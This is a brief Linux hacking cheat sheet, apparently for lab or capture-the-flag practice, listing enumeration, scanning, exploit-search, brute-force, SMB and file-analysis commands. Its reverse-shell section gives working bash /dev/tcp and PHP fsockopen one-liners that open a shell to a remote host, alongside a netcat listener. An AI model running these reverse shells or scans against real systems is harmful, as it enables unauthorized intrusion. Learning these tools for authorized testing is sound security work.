Linux Hacking Basic Cheat Sheet by

Basic networking

Show IP configuration
ip a s
DNS lookup
dig host-name.com
DNS Reverse lookup
dig -x 10.10.10.12
Lookup DNS entries for a host or IP
nslookup google.com
IP for hostname
host google.com

HTTP Download

Using curl
curl http://host:8080/file.sh -o output.sh
Using wget
wget http://host:8080/file.sh

Enumeration

Portscan (first 10000 ports)
nmap -sC -sV 10.10.10.12
Portscan (all ports)
nmap -p- -sV 10.10.10.12
Portscan (UDP)
nmap -sU 10.10.10.12
Gobuster
gobuster -w wordlist.txt dir -u http://10.10.10.12
Dirb
dirb http://10.10.10.12 wordlist.txt
WordPress enumeration
Website technology enumeration
DNS Enumeration
dnsrecon -d google.com -n 10.10.10.12
DNS zone transfer
dnsrecon -t axfr -d zonetransfer.me
List subdomains
sublist3r -d target-host.com
Wordlists can be found at
/usr/share/wordlists/dirbuster/
 

Find target in network

Readout ARP cache
ip neigh
Nmap Host Discovery
nmap -sn 10.10.10.0/24
TCP scan
nmap -Pn 10.10.10.0/24

Serving own data

Python2 Webserver (current folder)
python -m SimpleHTTPServer 8080
Python3 Webserver (current folder)
python3 -m http.server 8080
Listen on port
nc -lvnp 8080

Exploit DB

Search for exploit
searchsploit apache
View exploit
searchsploit -x path/to/exploit
Copy exploit to current directory
searchsploit -m path/to/exploit

Brute forcing

Bruteforce websites (e.g. login)
hydra
Bruteforce website paths
wfuzz
Crack files
john
Check each man-page to find the detailed command parameters

Server Message Block (SMB)

SMB enumeration tool
smbmap -H 10.10.10.12
SMB network browser
smbtree
SMB Client
smbclient //10.10.10.12/
 

Useful commands

Change directory
cd folder
Create directory
mkdir foldername
Delete file
rm file.jpg
Delete folder
rm -r folder
Search string in file
grep pattern file.txt
Find file in a folder
find /path -name "*.xml"
Edit file (vi)
vi file.txt

Reverse shell

Bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
PHP
$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");
Other webshells can be found at
/usr/share/webshells/

File analysis

What is this file?
file unknown.x
Is there something hidden?
binwalk file.png
Extract hidden content
binwalk -e file.png

Encoding/Decoding

Text to base64
echo -n "text" | base64
base64 to text
echo -n "dGV4dA==" | base64 -d
hexeditor
xxd
